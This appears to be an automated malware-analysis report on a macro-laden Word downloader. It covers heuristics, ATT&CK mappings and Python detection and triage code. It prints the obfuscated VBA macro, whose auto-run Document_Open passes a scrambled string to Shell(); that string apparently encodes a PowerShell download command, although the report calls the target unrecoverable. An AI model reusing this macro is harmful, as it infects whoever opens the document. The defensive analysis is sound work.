Verdict: MALICIOUS (risk score 222)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a Microsoft Word document (the macro lives in the ThisDocument module) whose VBA project defines a Document_Open procedure, so the macro runs as soon as the file is opened with macros enabled. That procedure reaches a Shell() call, which launches an arbitrary command line; ClamAV's signature Doc.Malware.Chronos-6897935-0 corroborates the verdict. The VBA is heavily obfuscated: every procedure is padded with dead loops and assignments to throwaway variables (string concatenations, UCase/RTrim/Right calls, arithmetic), and the meaningful content is assembled from StrReverse'd literals, as the extracted source below shows. Shell() together with the shell/download/object-execution tokens seen in the compiled p-code stream is the profile of a downloader, i.e. a macro that fetches and runs a second-stage payload. The only URL extracted from the file is an OOXML schema namespace, not a payload location, so the download target is not recoverable from the static findings on this page.
Heuristics (6)

- ClamAV: Doc.Malware.Chronos-6897935-0 [critical, CLAMAV_DETECTION]
  ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]
  Document contains VBA macro code.
- Shell() call in VBA [critical, OLE_VBA_SHELL]
  The VBA source calls Shell(), which starts an arbitrary command line from the macro.
- Document_Open macro [high, OLE_VBA_DOCOPEN]
  Document_Open runs automatically when the document is opened (subject to the macro security setting), so it is the auto-exec entry point.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
  The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents where source extraction failed, i.e. cases where no visible source is available.
- Embedded URL [info, EMBEDDED_URL]
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the OOXML DrawingML namespace identifier carried by any Office document with drawing content; it is not a network indicator and should not be blocked or hunted.
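The OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic above works on the compiled p-code/cache stream rather than on source. The following Python is an added, simplified stand-in for that idea and is not the analyzer's own implementation: identifier names and string literals still sit in the binary VBA streams as ANSI or UTF-16LE bytes (the exact layout is undocumented, hence matching both encodings), so a case-insensitive byte scan that pairs an auto-exec procedure name with an execution token catches documents whose source was stripped or could not be extracted. SAMPLE_STREAM and BENIGN_STREAM are constructed byte strings with binary padding around such names, not data taken from the sample.

```python
"""Added example: stand-in for a p-code/cache stream token heuristic."""
from typing import Dict, List

# Procedure names Office runs on open, and tokens that mean run/instantiate/fetch.
AUTOEXEC_TOKENS = [b"Document_Open", b"AutoOpen", b"Auto_Open", b"Workbook_Open", b"AutoExec"]
EXEC_TOKENS = [b"Shell", b"ShellExecute", b"CreateObject", b"WScript.Shell",
               b"URLDownloadToFile", b"powershell"]


def encodings(token: bytes) -> List[bytes]:
    """Names and literals may be stored as ANSI or UTF-16LE; match both."""
    return [token, token.decode("ascii").encode("utf-16-le")]


def find_tokens(stream: bytes, tokens: List[bytes]) -> Dict[str, int]:
    """Case-insensitive search; returns token -> first offset in the stream."""
    low = stream.lower()          # bytes.lower() only folds ASCII, which is what we want
    hits: Dict[str, int] = {}
    for tok in tokens:
        for enc in encodings(tok):
            pos = low.find(enc.lower())
            if pos != -1:
                hits[tok.decode("ascii")] = pos
                break
    return hits


def pcode_autoexec_exec(stream: bytes) -> dict:
    """Fire only when an auto-exec name and an execution token co-occur."""
    auto = find_tokens(stream, AUTOEXEC_TOKENS)
    exe = find_tokens(stream, EXEC_TOKENS)
    return {"autoexec": auto, "exec": exe, "fires": bool(auto) and bool(exe)}


# Constructed stand-ins (binary padding around names), not bytes from the sample.
SAMPLE_STREAM = (b"\x00\x01\xcc\x61\x00\x00" + "Document_Open".encode("utf-16-le")
                 + b"\xff\x05" + b"Shell\x00\x00mLCUMDm\x00\x00StrReverse\x00")
BENIGN_STREAM = b"\x00\x01" + "Document_Open".encode("utf-16-le") + b"\x00MsgBox\x00"

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_STREAM), ("benign", BENIGN_STREAM)):
        print(label, pcode_autoexec_exec(blob))
```

In practice the input is each module stream and the _VBA_PROJECT stream read with olefile. A lone "Shell" byte string is a weak signal (a benign UserForm can mention it), which is why the rule fires only on the pairing and why the report rates it high rather than critical.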
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35112 bytes | 29577c42cb439e71f05d6c457a5aba3c307a9446e4d498b906649270f6e034ad |

Preview of macros.bas (the analyzer shows the first 1,000 lines of the extracted script; the copy below is truncated):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function QnmDmO(PRKYACt As Boolean, AscHte As String, Rdmnizt As Double, zhNugCw As String, sLFHjt As Double) As String
For RKORbT = 0 To 179
QvRvxD = "&RW$AK@.mQ@$c" + "QcECkv mNcj%AMdvXzk*" + "ifZ&N?gLp[FQE"
ZmWsxAie = 1183 - 204 - 318
UDJgLmS = 1981 + 847 + 528
hKbOL = "Hd?Il^j?J ycJ" + "&pkd.*nYI ]g" + "FhvVxGTYeSGXkcMf"
UDJgLmS = UCase("vDoMciiP@#C")
XiKxvL = Left("kO&nD@DGaXhL", 5)
wYIbIDx = 812 + 110 + 1194
Next RKORbT
uDIjkz = 918 - 607 - 696
wYIbIDx = 958 - 993 - 720
OUqwXt = UCase("R-wEE(G(itI%Cf&")
QvRvxD = 1025 + 189 + 935
OiydRlwA = 1977 + 242 + 1883
OiydRlwA = "BOjx(QJqI?bX^&Vz!&" + "ldAU&_iND^^" + "[VEkLWQ.zHEr"
hKbOL = 161 + 1503 + 1476
For jkIfoL = 0 To 188
QvRvxD = UCase("BkIHIlS_P*nHX")
wYIbIDx = 475 + 661 + 219
zDflzEy = Right("g-iCmQuNQR", 2)
OiydRlwA = RTrim("EMFzJ$aOXKu#-LAHBy")
hKbOL = Right("ESIlnmz?FKuNph", 2)
uDIjkz = UCase(" ]iFkBuhQZu")
hKbOL = StrReverse("pxC pkJ$r?DW)KsBr$hg")
ZmWsxAie = LTrim("wa_pbBzg%CAfF")
wYIbIDx = Right("pOs!R^s(j^I%yX", 4)
Next jkIfoL
OiydRlwA = 110 - 868 - 348
wYIbIDx = "olOA_qvBAf_^J%V!" + "D#LVjRM!Ga" + "oWoU?vUf[fFbsV]?"
hKbOL = StrReverse("Lrd]MFJ[#sKf")
uDIjkz = "Ips(W^aT^]$Qy" + "hNUY^r@z#JIgn@" + "Uu-e(MQrF%F_"
OiydRlwA = StrReverse("hTxHGmY%DJ](bM")
OUqwXt = 673 - 770 - 323
wYIbIDx = RTrim("EXvC$DCfYG")
OUqwXt = 713 - 666 - 309
hKbOL = Right("BVFUp@TjiT)JxfBL%", 3)
UDJgLmS = RTrim("h &$v$GbXot")
OiydRlwA = RTrim("UZXb#SbDWTtY_")
QnmDmO = "BEQBIdjkDSSgdbEmOrgO"
End Function
Private Sub Document_Open()
Dim mLCUMDm As String
While duDGjG < 394
hKbOL = 854 + 565 + 807
OiydRlwA = RTrim("TR%iC scngQHjgEl&D")
duDGjG = duDGjG + 3
Wend
ZmWsxAie = Space(8)
uDIjkz = Right("]TW#Hj^Pt]AjLt#Wc", 5)
While TojUin < 207
UDJgLmS = Right(".ms&E?fjnkCp", 3)
hKbOL = RTrim("P@CBtb!$nKw(&n")
QvRvxD = LTrim("rPOI@ufYFmifk")
QvRvxD = Space(7)
uDIjkz = UCase("X$In&(MwoX")
TojUin = TojUin + 3
Wend
uDIjkz = 1618 + 359 + 1825
For mpTWaE = 0 To 315
qIsgt = 1950 - 1602 - 1155
OUqwXt = 1673 - 1156 - 1201
Next mpTWaE
hKbOL = Left("?wsUR@pZq-vqo", 3)
uDIjkz = 356 + 1844 + 1966
OUqwXt = Right("zxR-_nf%r]gIjjzvbxM", 5)
UDJgLmS = StrReverse("C_idZogDbMkt")
qIsgt = Space(7)
OiydRlwA = "ZYPlZ_@?fLDl&" + "mEdYZ(wuyYjIu$UibCV" + "zLW&c?D &A$zVn*B_PR"
wYIbIDx = 1458 + 1256 + 785
qIsgt = UCase("JORILxHG.cA!]y.AtP")
qIsgt = StrReverse("IB&(]]u!FIKPx")
OiydRlwA = 1101 + 337 + 1729
mLCUMDm = StrReverse("z;$'beaxWel.uWaN?Q*PEnm\_\c%RpXmSe@tE%#'A DsvsHeYcHonrnPC-dtWrYaatgSZ;^)J'(eWxuer.-WVNYQ!Pyn#\^\r%%pQmJebtn%_'U,L'^eqxme@.se%pJoGh_/#mTotcX.Ynba?i$gAenlOach.kzoulfe!hTt@/o/g:spLtXtth#'s(%eDl]i.FVdEa?oPlKnywEobDP.@)StonkegiSlcC#bXe^W@.Yt$eMN(.mmreBtHsiyMSQ ltwc-ecj*bYOT-xwVefNP(h hsCslaXpfyKbn Gp%eJ-w vlxldeShJsrrDeLwbovpc Ce]xhe(.ClslGe$hMs%rYeLwZocp")
XiKxvL = 314 - 1693 - 1808
XiKxvL = RTrim("f$p@DSEy-j$m L.")
zDflzEy = LTrim("^Uz.rtCjDZvB")
ZmWsxAie = LTrim("Z^yDN%^Y_@Tc^%lggd")
OUqwXt = "jr-PnNlDKLiguetJ%" + "xhziS#u^@Gzu_mPIhkR" + "xLLlY(%KbQ)C"
QvRvxD = Right("y-ju(@qNOvD^", 3)
uDIjkz = LTrim("yDzu^$e%%!LJ")
zDflzEy = 105 - 1049 - 398
uDIjkz = 409 - 126 - 552
zDflzEy = "b Oc?V#D)KoVftpe" + "xx?Ou!RsBdbL.oNd(A&c" + "V&PlacVP Y]Q"
QvRvxD = Right("XRXC^P ixSx-^", 2)
QvRvxD = RTrim("I-hNhkmdAyjr%Dve")
For iZXAqF = 0 To 310
zDflzEy = Space(2)
wYIbIDx = StrReverse("E$
... (truncated)
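The triage the summary describes (an auto-exec entry point that reaches Shell(), buried under junk padding and StrReverse'd literals) can be reproduced on the extracted macros.bas. The following Python is an added example and is not part of the analyzer or the report: it splits VBA source into procedures, drops assignments to variables that nothing in the procedure ever reads (the padding visible in the preview above), decodes StrReverse("...") literals, and flags auto-exec procedures that reach shell/download tokens either in source or in decoded strings. The embedded SAMPLE_VBA and the reversed command inside it are constructed for the demo and are not the sample's own macro; run it on the real file by passing the contents of macros.bas to triage().

```python
"""Added example: static triage of extracted VBA source. Pass macros.bas text to triage()."""
import re
from typing import Dict, List

PROC_START = re.compile(
    r"^\s*(?:(?:Private|Public|Friend)\s+)?(?:Static\s+)?(?:Sub|Function)\s+(\w+)", re.I)
PROC_END = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)
ASSIGN = re.compile(r"^\s*(\w+)\s*=")          # plain "name = expr" statement
IDENT = re.compile(r"\b\w+\b")
STRREV = re.compile(r'StrReverse\(\s*"((?:[^"]|"")*)"\s*\)', re.I)

# Procedures Office runs on open/close without a click (Word and Excel names).
AUTO_EXEC = {"document_open", "autoopen", "auto_open", "workbook_open",
             "autoexec", "autoclose", "auto_close", "document_close"}
# Tokens that mean "run something" or "fetch something".
EXEC_TOKENS = {
    "Shell()": re.compile(r"\bShell\b", re.I),
    "CreateObject": re.compile(r"\bCreateObject\b", re.I),
    "WScript.Shell": re.compile(r"WScript\.Shell", re.I),
    "URLDownloadToFile": re.compile(r"\bURLDownloadToFile\w*", re.I),
    "powershell": re.compile(r"\bpowershell\b", re.I),
}

# Constructed input modelled on the junk-padded style of the preview above.
# Not the sample's macros.bas; the reversed command is invented for the demo.
DEMO_CMD = "powershell -nop -w hidden -c demo_only"
SAMPLE_VBA = f'''Attribute VB_Name = "ThisDocument"
Private Function QnmDmO(PRKYACt As Boolean) As String
    For RKORbT = 0 To 179
        QvRvxD = "&RW$AK@.mQ@$c" + "QcECkv mNcj%AMdvXzk*"
        UDJgLmS = UCase("vDoMciiP@#C")
    Next RKORbT
    QnmDmO = "BEQBIdjkDSSgdbEmOrgO"
End Function
Private Sub Document_Open()
    Dim mLCUMDm As String
    While duDGjG < 394
        hKbOL = 854 + 565 + 807
        duDGjG = duDGjG + 3
    Wend
    mLCUMDm = StrReverse("{DEMO_CMD[::-1]}")
    OiydRlwA = RTrim("TR%iC scngQHjgEl&D")
    Shell mLCUMDm, vbHide
End Sub
'''


def split_procedures(src: str) -> Dict[str, List[str]]:
    """Map procedure name -> body lines (header and End line excluded)."""
    procs: Dict[str, List[str]] = {}
    current, body = None, []
    for line in src.splitlines():
        m = PROC_START.match(line)
        if current is None and m:
            current, body = m.group(1), []
        elif current is not None and PROC_END.match(line):
            procs[current] = body
            current = None
        elif current is not None:
            body.append(line)
    return procs


def decode_strreverse(line: str) -> List[str]:
    """Return the plaintext of every StrReverse("literal") on the line."""
    return [lit.replace('""', '"')[::-1] for lit in STRREV.findall(line)]


def live_lines(name: str, body: List[str]) -> List[str]:
    """Drop stores to variables nothing in the procedure reads (the padding).
    Assignment to the procedure's own name is its return value, so it stays."""
    reads: Dict[str, int] = {}
    for line in body:
        m = ASSIGN.match(line)
        for ident in IDENT.findall(line[m.end():] if m else line):
            reads[ident.lower()] = reads.get(ident.lower(), 0) + 1
    kept = []
    for line in body:
        m = ASSIGN.match(line)
        if m and m.group(1).lower() != name.lower() and not reads.get(m.group(1).lower()):
            continue
        kept.append(line)
    return kept


def triage(src: str) -> dict:
    """Pair auto-exec entry points with execution tokens found in source or decoded text."""
    report = {"auto_exec": [], "exec_tokens": {}, "decoded": [], "live": {}}
    for name, body in split_procedures(src).items():
        if name.lower() in AUTO_EXEC:
            report["auto_exec"].append(name)
        report["live"][name] = live_lines(name, body)
        hits = set()
        for line in body:
            decoded = decode_strreverse(line)
            report["decoded"].extend(decoded)
            for text in (line, *decoded):
                hits.update(lbl for lbl, pat in EXEC_TOKENS.items() if pat.search(text))
        if hits:
            report["exec_tokens"][name] = sorted(hits)
    armed = any(p in report["exec_tokens"] for p in report["auto_exec"])
    report["verdict"] = "suspicious" if armed else "no auto-exec/exec pairing"
    return report


if __name__ == "__main__":
    r = triage(SAMPLE_VBA)
    print(r["verdict"], r["auto_exec"], r["exec_tokens"], r["decoded"])
    print("\n".join(r["live"]["Document_Open"]))
```

StrReverse is only the outermost layer on this sample: the reversed literal in the preview's Document_Open still looks scrambled after reversal, which means a further transformation is applied before the string reaches Shell(). When decoded output is not readable, look in the live lines for the next string operation applied to that variable and extend the decoder accordingly rather than reading the partial result as the final command.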